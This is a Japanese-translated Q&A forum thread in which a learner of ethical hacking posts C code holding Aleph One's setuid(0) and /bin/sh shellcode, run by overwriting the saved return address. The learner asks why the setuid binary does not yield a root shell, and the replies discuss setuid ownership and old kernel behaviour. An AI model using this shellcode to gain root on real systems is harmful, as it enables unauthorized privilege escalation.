c - 私はこのコードを持っています....倫理的ハッキング

Question

Ethical Hacking に関するこの EBook をフォローしていて、Linux Exploit の章に到達しました。これは、Aleph の 1 コードを含むコードです。

//shellcode.c

char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { //main function

    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return

    //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the

    //address of the shellcode, so it executes.

}

これにスーパーユーザー権限を与えます。

chmod u+s shellcode

スーパーユーザーとして、通常のユーザーに戻ります

su - normal_user

しかし、実行するとき./shellcodeはルートユーザーになる必要がありますが、代わりにまだnormal_userなので、何か助けはありますか?? ところで、私はBT4-Finalに取り組んでおり、ASLRをオフにして、VMWareでBT4を実行しています...

Answer 1

これが古いエクスプロイトである場合は、かなり前に修正されているはずではありませんか?

ところで、個人的なアドバイスとして、そのニックネームを使用して悪用について尋ね回るのを怠らないでください。

Answer 2

実行可能ファイルはshellcoderoot によって所有されていますか? setuid ビット (u+s) は、実行可能ファイルをその所有者(必ずしも root ではない) の特権で実行します。

Answer 3

正しく理解できれば、実行しているコード (setuid(0)) は、現在のユーザーをrootに変更するシステム コールです。問題は、そのプロセスの現在のユーザー ID を変更し、そのプロセスにルート権限を与えることです。機能している場合は、ルート権限で何でも実行できます。

テストするには、ルートを持つファイルまたはディレクトリを作成し、単純なユーザーとして削除できないことを確認してから、ファイルを削除するコードを実行可能ファイルに追加してみてください。コードが機能している場合は、ファイルを削除する必要があります。

次に、root 権限を取得するために、プログラム内から新しいシェルへのフォークを試みます。ただし、それが可能かどうかはわかりません。

...しかし、これは古いエクスプロイトです。古いカーネルはこれに対してオープンである可能性がありますが、最近のリリースを使用しても何も起こりません。

更新:コードを読み直したところ、シェルへの呼び出しがそこ (/bin/sh) にあることに気付きました。そのため、想定されるスーパーユーザー シェルに既に分岐しています。実際に機能しているかどうかを確認するには、呼び出しの前後にシェルの PID を確認します。変更されている場合は、シェルを終了し、以前の PID に戻る必要があります。つまり、(1) 機能し、スタックを操作してそのコードを実行し、(2) エクスプロイトが修正され、カーネルがアクセスを妨げていることを意味します。

Answer 4

さて、setuid() は、現在実行中のプログラムのユーザーを変更します。シェルは引き続き通常のユーザーで実行されます! :)

それか、このハックの目的がわかりません。

Answer 5

setuid は、プログラムの実行中にのみ uid を 0 に設定すると思います。シェルコードの実行中に UID を確認する操作を実行できますか?